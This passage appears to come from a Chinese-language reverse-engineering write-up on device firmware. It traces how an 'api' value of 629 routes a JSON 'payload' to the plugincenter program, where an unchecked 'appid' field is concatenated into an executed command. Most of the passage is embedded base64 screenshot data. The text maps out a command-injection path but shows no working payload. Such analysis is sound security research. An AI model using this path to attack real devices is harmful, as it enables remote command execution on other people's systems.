qCombXlP6dAKGAUpY0MprEQkRnonnNvu8TSUo6lpRxXtufQIxERERE5ccyU3V6SaiZIGlDbc+bXqdPEKfmBveGBUbd6k3LdIp22Ztad8cbbDzpaiZlnWG19AdavwaC4XZQ2p0UpD2vZwUGfagWwQuWYMUhYUN8Fd4Q2MpjGQkRmoT1zb7/KhUs1Lt+yuf44/JUTERERERlXZ5lx15x7LtVCnt21LBvc9OblAzCSZDNxYoTm6/PVi7lQKWsrmOfs1TCS2QgZjw6Vch0juYFJZcx9OiSZzbQH4PyyYZJZMuNG5p
|
|||
|
|
<p blockindex=52>在<code>DataCenterHandler::request</code>函数中,在调用<code>APIMapping::APIMapping</code>函数建立好上述的映射关系表后,紧接着调用了<code>APIMapping::redirectRequest</code>函数。其中,先获取了<code>Json</code>对象中的<code>api</code>字段的值,存放在<code>v8</code>变量中,然后经历了一个<code>for</code>循环,其中有对<code>v8</code>值的判断比较,最后执行了一个函数指针。这里需要稍微解释一下,此处的<code>a1</code>就是上面建立的<code>map</code>映射表,类型是<code>std::map<int,void (*)(json_object *,std::string &)></code>,即第一个元素(键值)是整数,第二个元素(实值)是函数指针。所以此处的<code>for</code>循环就是对<code>map</code>的操作,但是都是用的偏移值,不好看出来具体是什么,其实这里也没必要去查源码,我们直接自己写一个<code>map</code>容器的遍历,然后静态编译出来,反编译后这些偏移值的含义也就都清楚了。此处的<code>for</code>循环其实就是执行了<code>map.find()</code>的操作,寻找了<code>map</code>中<code>key</code>为<code>v8</code>(即<code>api</code>值)的迭代器,偏移<code>+32</code>就是第一个键值元素(<code>api</code>值),偏移<code>+40</code>则是第二个实值元素(<code>handler</code>的函数指针)。显然,此处就是根据传入的<code>api</code>字段值调用对应的<code>handler</code>的过程。到这里,上述建立的<code>Mapping Table</code>中的映射关系也更加明朗了。</p>
|
|||
|
|
<p blockindex=53><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=54>上文说过,当<code>api</code>为<code>629</code>时,传入的<code>payload</code>字段的数据会被转发给<code>plugincenter</code>程序处理。所以最后来到了<code>/usr/sbin/plugincenter</code>程序中,找到<code>datacenter::PluginApiMappingExtendCollection::sConstructMappingTable</code>函数,仍然是通过<code>map</code>建立了<code>api</code>编号和对应<code>handler</code>函数的映射关系。可以看到,当<code>api</code>编号为<code>629</code>的时候,会执行到<code>parseGetIdForVendor</code>函数进行处理。</p>
|
|||
|
|
<p blockindex=55><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=56>在<code>parseGetIdForVendor</code>函数中,会将传入的<code>Json</code>数据内的<code>appid</code>字段作为参数传递到<code>PluginApi::getIdForVendor</code>函数中。</p>
|
|||
|
|
<p blockindex=57><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=58>在<code>PluginApi::getIdForVendor</code>函数中,可以很明显地发现:<strong>即使<code>appid</code>字段合法性检查不通过,也会被拼接入命令中并执行</strong>。显然,这里是一个开发上的疏忽,在判断<code>!IsValidAppId</code>的条件分支内,在输出报错信息后,应当在最后加上<code>return ;</code>返回,不能继续执行下去。</p>
|
|||
|
|
<p blockindex=59><img src="data:image/png;base64,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